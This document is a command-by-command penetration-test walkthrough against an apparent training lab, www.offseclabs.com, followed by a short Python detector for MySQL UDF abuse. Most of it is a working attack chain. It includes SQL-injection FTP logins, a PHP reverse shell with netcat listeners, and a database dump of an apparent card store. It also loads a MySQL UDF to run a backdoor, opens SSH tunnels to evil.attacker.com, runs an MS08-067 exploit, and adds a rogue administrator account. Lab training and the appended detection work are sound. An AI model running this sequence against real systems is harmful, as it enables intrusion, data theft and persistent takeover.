Penetration Testing in the real world

Open Terminal A : 
nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username – bob
password – bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username – %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --
password – 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py -> (see above ftp-brute.py)
./brute.py
(find the fifth user, whose home directory is mapped to the web server's document root)
clear
ftp www.offseclabs.com
username – %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --
password – 1
(logged in as the fifth user)
ls
put rs.php -> (a reverse PHP shell)
———————–
Open Terminal B :
nc -lvp 80
———————–
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we get a reverse shell)
———————–
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password, as well as the MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
————————
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
————————-
Go back to Terminal A :
(inside the ftp server)
put up.html -> (an HTML file-upload form)
put up.php -> (the PHP file-upload handler)
————————-
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and mark it as 1)
(upload rs [a binary reverse shell] and mark it as 2)
** Details of lib_mysqludf_sys.so
—————————
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
—————————-
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)
—————————
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press Enter; you will get a reverse shell at Terminal D)
—————————-
Open Terminal E :
nc -lvp 80
—————————-
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');
(press Enter and we get another reverse shell at Terminal E)
—————————
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
—————————–
Open Terminal F :
netstat -antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse
—————————–
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
——————————
Go back to Terminal F :
cd core
nano nx.py -> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ipconfig
net user hacker hacker /add
net localgroup administrators hacker /add
———————————
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
———————————–
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username – hacker and password – hacker)
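As an added defensive example (not part of the original walkthrough): the UDF chain run at Terminal B leaves a recognisable three-stage sequence in the MySQL general query log, a binary written with INTO DUMPFILE, a function registered with CREATE FUNCTION ... SONAME, and a sys_eval/sys_exec call. The script below scans constructed log lines in an assumed `<time> <conn-id> Query <sql>` format and flags each stage plus any connection that completed all three.

```python
import re
from typing import NamedTuple

# One regex per stage of the UDF-loading chain, in the order it appears above.
STAGES = [
    ("dumpfile_write", re.compile(r"\bINTO\s+(DUMPFILE|OUTFILE)\b", re.I)),
    ("udf_register", re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),
    ("udf_exec", re.compile(r"\bsys_(eval|exec)\s*\(", re.I)),
]

class Finding(NamedTuple):
    time: str
    conn_id: str
    stage: str
    statement: str

# Assumed general-log line shape: "<time> <connection id> Query <sql>".
LOG_RE = re.compile(r"^(?P<time>\S+)\s+(?P<id>\d+)\s+Query\s+(?P<sql>.+)$")

def scan_general_log(lines):
    """Return one Finding per logged query that matches a chain stage."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        sql = m.group("sql")
        for stage, pattern in STAGES:
            if pattern.search(sql):
                findings.append(Finding(m.group("time"), m.group("id"), stage, sql))
                break
    return findings

def connections_with_full_chain(findings):
    """Connection ids that performed all three stages: the highest-confidence alert."""
    seen = {}
    for f in findings:
        seen.setdefault(f.conn_id, set()).add(f.stage)
    needed = {stage for stage, _ in STAGES}
    return sorted(cid for cid, stages in seen.items() if needed <= stages)

# Constructed sample log mirroring the statements in the walkthrough (not real data).
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z 42 Query use pwn",
    "2024-01-01T10:00:02Z 42 Query SELECT imgdata from binfile where title=\"1\" into dumpfile '/usr/lib/lib_mysqludf_sys.so'",
    "2024-01-01T10:00:03Z 42 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'",
    "2024-01-01T10:00:04Z 42 Query SELECT sys_eval('id')",
    "2024-01-01T10:00:05Z 43 Query SELECT products_name FROM products WHERE products_id=7",
]

if __name__ == "__main__":
    hits = scan_general_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f.time} conn={f.conn_id} {f.stage}: {f.statement}")
    print("full chain on connections:", connections_with_full_chain(hits))
```

Each stage on its own is noisy (INTO OUTFILE has legitimate uses), so alert on the completed chain per connection and treat single stages as lower-severity signals.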
